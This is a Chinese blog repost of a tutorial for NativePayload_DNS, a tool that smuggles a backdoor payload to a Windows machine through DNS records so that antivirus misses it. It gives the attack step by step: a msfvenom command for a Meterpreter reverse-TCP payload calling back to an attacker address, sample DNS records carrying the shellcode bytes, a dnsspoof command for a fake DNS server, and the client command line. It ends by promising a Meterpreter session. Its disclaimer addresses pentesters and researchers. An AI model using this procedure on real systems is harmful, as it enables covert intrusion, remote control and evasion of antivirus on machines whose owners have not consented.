天天看點

NativePayload_DNS,通過DNS流量,繞過防病毒傳輸後門

版權聲明:轉載請注明出處:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396319 傳送門

注意标點符号,必須是英文的。

通過DNS流量和繞過防病毒傳輸的後門有效負載的C#代碼

由Damon Mohammadbagher發表

警告:此代碼釋出用于解釋針對Pentesters和安全研究人員的反病毒漏洞

欲了解更多資訊,請一步一步通路以下連結:

通過DNS流量繞過帶有傳輸後門有效負載的反病毒

文章備份位址

視訊由Damon Mohammadbagher發行(bbxc9x00x1f)

繞過反病毒與DNS流量傳輸後門有效負載

視訊

(需要通路YouTube)

用NativePayload_DNS和Meterpreter_Payload_Detection繞過AV

視訊說明:使用NativePayload_DNS.exe繞過AV并通過Meterpreter_Payload_Detection工具檢測Meterpreter程序

步驟1:

msfvenom C類型的有效負載在你的kali linux

msfvenom --platform windows -arch x86_64 -p windows/x64 /meterpreter/reverse_tcp lhost = 192.168.1.50 -fc> /root/Desktop/payload.txt
           

将有效載荷從payload.txt檔案複制到dns.txt,格式如下:

root @ kali:〜#cat /root/Desktop/dns.txt

1.1.1.0“0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com”

1.1.1.1“0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com”

1.1.1.2“0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com”

1.1.1.3“0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com”
           

步驟2:在您的kali linux中制作假DNS伺服器

root @ kali:〜#dnsspoof -i eth0 -f /root/Desktop/dns.txt
           

步驟3:

在用戶端運作代碼

文法:

NativePayload_DNS.exe“1.1.1”. 34“192.168.1.50”
           

最後你可以繞過AV,你有Meterpreter Session

通過DNS流量繞過帶有傳輸後門有效負載的反病毒,備份位址

相關工具:

用于通過IPv6位址(AAAA)記錄和DNS流量傳輸的Backdoor Payload的C#代碼也繞過防病毒

相關連結:

用C#通過加密有效載荷繞過所有防病毒

繼續閱讀